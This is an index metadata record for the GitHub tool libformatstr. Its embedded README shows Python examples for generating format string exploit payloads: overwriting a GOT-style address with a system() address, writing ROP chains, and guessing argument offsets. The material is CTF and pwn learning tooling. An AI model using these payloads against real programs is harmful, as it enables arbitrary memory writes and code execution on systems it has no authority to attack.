{"id":13395918,"url":"https://github.com/hellman/libformatstr","last_synced_at":"2025-04-11T21:38:57.330Z","repository":{"id":46284230,"uuid":"3213035","full_name":"hellman/libformatstr","owner":"hellman","description":"Simplify format string exploitation.","archived":false,"fork":false,"pushed_at":"2021-11-02T09:15:14.000Z","size":19,"stargazers_count":338,"open_issues_count":5,"forks_count":37,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-04-04T11:05:52.412Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hellman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2012-01-18T22:19:06.000Z","updated_at":"2025-02-22T22:21:15.000Z","dependencies_parsed_at":"2022-09-22T19:41:23.456Z","dependency_job_id":null,"html_url":"https://github.com/hellman/libformatstr","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hellman%2Flibformatstr/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hellman","download_url":"https://codeload.github.com/hellman/libformatstr/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248485396,"owners_count":21111848,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-30T18:00:35.570Z","updated_at":"2025-04-11T21:38:57.297Z","avatar_url":"https://github.com/hellman.png","language":"Python","readme":"libformatstr.py\n====================\n\nSmall script to simplify format string exploitation.\n\nUsage\n---------------------\n\n* Case 1 - replace one dword:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\naddr = 0x08049580\nsystem_addr = 0x080489a3\n\np = FormatStr()\np[addr] = system_addr\n\n# buf is 14th argument, 4 bytes are already printed\nsys.stdout.write( p.payload(14, start_len=4) )\n```\n\n* Case 2 - put ROP code somewhere:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\naddr = 0x08049580\nrop = [0x080487af, 0x0804873c, 0x080488de]\np = FormatStr()\np[addr] = rop\n\nsys.stdout.write( p.payload(14) )\n```\n\n* Case 3 - guess argument number and padding:\n\n```python\nimport sys\nfrom libformatstr import FormatStr\n\n# let's say we have do_fmt function,\n# which gives us only output of format string\n# (you can also just copy fmtstr and output manually)\n\nbuf_size = 250  # fix buf_size to avoid offset variation\nres = do_fmt(make_pattern(buf_size))\nargnum, padding = guess_argnum(res, buf_size)\n\n# of course you can use it in payload generation\n\np = FormatStr(buf_size)\np[0xbffffe70] = \"\\x70\\xfe\\xff\\xbf\\xeb\\xfe\"  # yes, you can also put strings\n\nsys.stdout.write( p.payload(argnum, padding, 3) ) # we know 3 bytes were printed already\n```\n* Case 4 - write something in specificed order:\n\n```python\nfrom libformatstr import FormatStr\nf=FormatStr(autosort=False) #This option disables auto sorting\nf[0x1234]=0x1\nf[0x5678]=0x2\nf[0xabcd]=0x3\n\n#The payload will write address 0x1234 first,then 0x5678,then 0xabcd.\n```\n\n* Case 5 - while you are in amd64:\n\n```python\nfrom libformatstr import FormatStr\nf=FormatStr(isx64=1) #This option force script to use 64bit address while generating payload\nf[0x1234]=0x1\nf[0x5678]=0x2\nf[0xabcd]=0x3\n```\nAbout\n---------------------\n\nAuthor: hellman ( hellman1908@gmail.com )\n\nLicense: MIT License ( http://opensource.org/licenses/MIT )\n","funding_links":[],"categories":["[*] System hacking / Pwnable","Exploiting / Pwn","Exploits","Programming/Comp Sci/SE Things"],"sub_categories":["[+] TIP \u0026 Tools  :+1:","Exploitation/PWN"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhellman%2Flibformatstr","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhellman%2Flibformatstr","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhellman%2Flibformatstr/lists"}